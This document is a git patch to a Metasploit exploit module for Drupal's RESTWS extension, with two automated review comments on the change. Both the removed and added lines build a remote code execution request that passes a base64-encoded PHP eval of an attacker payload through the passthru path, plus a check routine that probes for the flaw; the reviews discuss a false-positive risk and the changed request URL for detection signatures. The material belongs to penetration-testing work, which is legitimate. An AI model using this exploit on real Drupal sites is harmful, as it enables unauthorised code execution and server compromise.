From 9c8e351ba89ca8717df6dfd57f2ced86d899a74c Mon Sep 17 00:00:00 2001
From: Mehmet Ince
Date: Tue, 19 Jul 2016 20:12:14 +0300
Subject: [PATCH] Use vars_get un send_request_cgi
---
 .../exploits/unix/webapp/drupal_restws_exec.rb | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/unix/webapp/drupal_restws_exec.rb b/modules/exploits/unix/webapp/drupal_restws_exec.rb
index 51a8e2d3f6..546d2d0c73 100644
--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -53,10 +53,12 @@ class MetasploitModule < Msf::Exploit::Remote
 def check
 r = rand_text_alpha(8 + rand(4))
- url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r , "/passthru/echo%20#{r}")
 res = send_request_cgi(
 'method' => 'GET',
- 'uri' => url
+ 'uri' => normalize_uri(target_uri.path, "index.php"),
+ 'vars_get' => {
+ 'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
+ }
 )
 if res && res.body =~ /#{r}/
 return Exploit::CheckCode::Appears
@@ -66,15 +68,13 @@ class MetasploitModule < Msf::Exploit::Remote
 def exploit
 random = rand_text_alpha(1 + rand(2))
- url = normalize_uri(target_uri.path,
- "?q=taxonomy_vocabulary/",
- random ,
- "/passthru/",
- Rex::Text.uri_encode("php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
- )
+ cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
 send_request_cgi(
 'method' => 'GET',
- 'uri' => url
+ 'uri' => normalize_uri(target_uri.path, "index.php"),
+ 'vars_get' => {
+ 'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
+ }
 )
 end
 end
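Review bot: The `Appears` verdict in `check` can be a false positive, because the token `r` that is searched for in `res.body` is itself sent twice inside the new `q` value; any page that reflects the requested path, such as an error page, would match without a command having run. Scan results built on this check would then overstate exposure. At minimum the limitation should be recorded above the match, e.g. `# NOTE: r is part of the request, so a response that reflects q also matches`. Tightening the condition to `if res && res.code == 200 && res.body.include?(r)` would narrow it further, assuming the vulnerable endpoint answers with 200, which the hunk does not show. The body of `check` continues past the end of the hunk.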
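Review bot: The request target changes here, not only the way the parameter is passed, and neither the commit subject nor a comment records it. The old code appended `?q=...` directly to `target_uri.path`, while the new `'uri'` line requests `index.php` beneath it; the `check` hunk has the same change. Anyone keeping log queries or signatures for this module's traffic needs to know that the URL shape differs from earlier versions. The explicit `Rex::Text.uri_encode` call is also removed, so encoding of `cmd` is presumably left to `send_request_cgi`. A comment above the call such as `# index.php is requested explicitly; vars_get values are encoded by send_request_cgi` would document both decisions.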